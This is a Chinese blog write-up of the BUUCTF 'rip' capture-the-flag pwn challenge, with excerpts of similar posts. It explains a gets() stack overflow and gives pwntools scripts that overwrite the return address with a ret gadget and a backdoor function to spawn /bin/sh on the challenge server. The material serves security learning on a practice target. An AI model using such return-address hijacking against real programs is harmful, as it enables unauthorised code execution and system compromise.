初学pwn-BUUCTF(rip)

最新推荐文章于 2025-06-12 23:07:58 发布
最新推荐文章于 2025-06-12 23:07:58 发布
阅读量2.8k 收藏 6
点赞数 1
CC 4.0 BY-SA版权
分类专栏: pwn 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_44547827/article/details/120006420
本文介绍了作者在BUUCTF平台上进行的一次pwn题解题过程,涉及栈溢出漏洞的利用。通过分析程序,找到/bin/sh的地址并构造payload,尝试获取shell权限。在初次尝试失败后,了解到64位系统中地址需要对齐,通过添加retn指令解决了问题,最终成功获取shell。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

初学pwn-writeUp

BUUCTF平台的一道题目,rip。
与之前同样的步骤,启动靶机,链接远端
在这里插入图片描述
发现这里提示输入一些内容,但是输入完成之后,这里就结束了。还是要打开文件查看一下。
在这里插入图片描述
看到这里,只有一个输入的过程可以操作,那就很清楚了,就是要栈溢出了。点进去看一下。
在这里插入图片描述
可以看到这里s这个数组是15个字节,到r这个返回值还需要8个字节。不过这里要注意的一点是,这个15是十进制的,不能像之前再在数字之前加0x标记十六进制,这里可以直接写十进制。
摁shift+f12,可以看到这时还有什么地址可能会用到,
在这里插入图片描述
发现了我们的关键字,/bin/sh,这就是我们想要的指令,继续查看,可以发现,这个指令在fun()函数中。
在这里插入图片描述
那就简单了,跟之前的套路完全一样,只要把fun函数的地址返回给刚刚我们在s数组后看到的r中就可以。
编写脚本

from pwn import *

p = remote("node4.buuoj.cn", 25119);

payload = 'a' * 23 + p64(0x401186).decode("iso-8859-1");
p.sendline(payload);

p.interactive();

但是很遗憾,失败了。
在这里插入图片描述
执行脚本之后,发现并没有获得shell权限。遇到这个问题,就很奇怪,明明是没有什么问题,很简单的一个练习。只能求助于百度。搜索之后发现64位系统中,需要地址对齐之后才可以执行system。这里需要在fun函数的地址之前加一个retn的地址,在IDA-view里随便找一个retn的指针都可以。具体的原理还没理解,不过这样可以解决地址对齐的问题。
修改脚本

from pwn import *

p = remote("node4.buuoj.cn", 25119);

payload = 'a' * 23 + p64(0x401185).decode("iso-8859-1") +  p64(0x401186).decode("iso-8859-1");
#p.recvuntil("please input");
p.sendline(payload);

p.interactive();

解决问题!

BUUCTF-rip 尝试PWN入门
brightendavid的博客
05-04 1719
BUUCTF-rip 拿到的是一个什么呢,感觉是一个小系统? 但是也就是一个小程序嘛。 这个程序就是执行一个输入输出 的命令。但是这里面存在漏洞。 这个s是15byte的字符 在fun部分有一个/bin/sh 这个据说是一个系统级函数,为什么说是系统级函数呢,因为有一个system吧。 一般会是什么用都没有。 但是在使用这样的一个payload后,就可以利用,也不知道这个pwn 库是做了什么。感觉像是变魔术。要刚好把堆栈覆盖到这个系统函数的位置?是不是这个解释呢。 #python3 需要预先安
BUUCTF - PWNrip
古月浪子的博客
03-19 1728
checksec一下,发现啥保护也没开 IDA打开看看,明显的栈溢出漏洞,IDA给出了s的长度为0xf 发现后门函数 脚本中使用地址0x401186发现不行(不知道为什么),换成0x401187发现可以 from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.l...
BUUCTF(Pwn) rip
半岛铁盒的博客
03-20 583
按tab键,看一下 fun函数 发现其地址是 0x401186; 但是写EXP不能直接用这个地址,需要使用0x40118A这个地址,system函数是在0x40118A压参数然后执行 from pwn import * p = remote('node3.buuoj.cn', '25677') payload = 'a' * (0xf + 8) + p64(0x40118A) p.sendline(payload) p.interactive() ...
全面理解BUUCTF-rip1
最新发布
2301_76794844的博客
06-12 1333
全面理解BUUCTF-rip1
BUUCTFrip
^_^
12-08 3448
这题和蒸米ROP的level3有点像。 检查安全机制。 用ida反汇编,可以看到是gets函数有个简单的栈溢出,偏移也很好计算,F+8=23 此外还发现一个fun函数可以直接跳转到这里来获取shell。 正常exp如下: from pwn import * p = process("./pwn1") #p = remote("node3.buuoj.cn",29399) payload = "a" * 23 +p64(0x401186) p.sendline(payload) p.interact
[buuctf] rip
zn106414的博客
03-31 775
64位,源程序几乎没有开启任何保护 用ida打开 存在危险函数gets,没有限制输入,存在栈溢出漏洞 还有一个func函数执行了/bin/sh命令 双击s来到Stack of main视图,发现只需存入15个字节即可劫持函数返回地址 因为是64位程序,还需要加8字节的返回地址,因此偏移量为23 或者这里也可以使用pwntools计算一下: pattern create 200 pattern offset A(AADAA; 也可以...
BUUCTF-rip
m0_64180167的博客
04-11 735
看了这个文章 我起码能理解我们栈溢出的目的在做题之前 我们需要先理解栈的存储方法从上往下看 就能理解入栈说回这道题目为什么这道题目是栈溢出。
buuctf pwn详细
02-26
针对`rip1`这类基础题目,尽管看似简单,但对于初学者而言仍具一定难度。此题涉及到了基本的溢出漏洞利用技术以及如何通过控制返回地址来实现特定功能调用的理解[^2]。 ##### 实际操作流程 考虑如下C代码片段展示了...
BUUCTF_PWN - rip
weixin_46009088的博客
12-06 807
BUUCTF_PWN - rip 查看程序保护模式和文件基本信息: 没有什么保护,各条保护详情介绍请看胡写瞎写(1) pwntools常见命令,另外文件是64位小端程序 IDA载入 找到main函数F5: 发现一个 gets ( ) 函数,一个可以利用的漏洞点,gets ( ) 函数介绍: get( )函数简单易用,它读取从输入流中读取一行,赋给字符串变量s,直到遇到换行符,然后丢弃换行符,存储其余的字符,并在结尾添加一个空字符使其成为一个 C 字符串,但是它无法检查数组是否装的下,因此它只知道开始处,.
pwn学习(3)BUUCTF-rip(函数知识/缓冲区溢出)
m0_66039322的博客
09-21 1028
1.函数调用栈是指程序运行时内存一段连续的区域。(特殊的内存)2.用来保存函数运行时的状态信息,包括函数参数与局部变量等。3.称之为‘栈’是因为发生函数调用时,调用函数(caller)的状态被保存在栈内,被调用函数(callee)的状态被压入调用栈的栈顶。4.在函数调用结束时,栈顶的函数(callee)状态被弹出,栈顶恢复到调用函数(caller)的状态5.函数调用栈在内存中从高地址向低地址生长,所以栈顶对应的内存地址在压栈时变小,退栈时变大。
[BUUCTF-pwn]——rip
Y_peak的博客
01-30 1309
BUUCTF——rip 题目地址:https://buuoj.cn/challenges 题目: 同样我们现将文件下载下来,在Linux上用checksec 看下信息,发现这是一个64位程序,并且任何保护都没开。???? (任何保护都没开,基本就是栈溢出) 在window用IDA反汇编看看,打扰了main函数没有任何有用的东西,没有我们要找的system函数 看看其他函数看看有没有,功夫不负有心人。fun函数中,有我们想要的东西 赶快查看下fun函数所在的位置 0x401186 。我们看到是在0x
BUUCTF (PWN) RIP详细分析
热门推荐
qy201706的博客
04-08 1万+
很简单的栈溢出,不过对于栈溢出具体过程不理解的会卡的很惨; 由于初学嘛,就看了网上的wp,好像都是之前版本的,现在用就不太对,可能我入坑BUUCTF比较晚,现在用的题都是运行在Ubuntu18上的,故需要考虑堆栈平衡~~
[每日一PWN]BUUCTF RIP
qq_55233040的博客
11-19 351
比赛隐身,反思结束,从头详细记录一下,每日记录一题,第一题的nc就不用记了,所以直接从第二题rip开始。
BUUCTF -rip
weixin_56301399的博客
07-20 501
用IDAPro64bit打开pwn1后按F5反汇编源码并查看主函数,发现gets()函数读取输入到变量s中,s的长度只有0xf,即可用栈大小只有15字节,但是gets()函数并没有限制输入,显然存在栈溢出漏洞。先file./pwn1查看文件类型再checksec--file=pwn1检查一下文件保护情况。且fun()函数的起始地址为0x401186。得到信息64位,各项保护都未开启。......
buuctf-rip
Nike_name的博客
06-13 779
利用get危险函数和system/bin/sh 的栈溢出
BUUCTF|rip
cm_zl
04-30 2242
from pwn import * context.log_level = 'debug' io=remote('node3.buuoj.cn', "28808") payload = "A"*(0xf + 8) + p64(0x401198)+ p64(0x401186) io.sendline(payload) io.interactive()
[BUUCTF]PWN------rip
BangSen1的博客
01-13 395
rip 例行检查,无保护 运行一下,输出了我们输入的东西, 用64位IDA打开,看到了/bin/sh
BUUCTF pwn——rip
CNS-Enterprise BCC-1701-J
03-10 378
BUUCTF 做题练习
pwn-入门rip
03-24
### PWN 入门中的 RIP 概念及用法 #### 什么是 RIP 寄存器? RIP(Instruction Pointer)是 x86_64 架构下的指令指针寄存器,用于存储当前正在执行的指令地址。当 CPU 执行一条指令时,它会自动更新 RIP 的值到下一...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值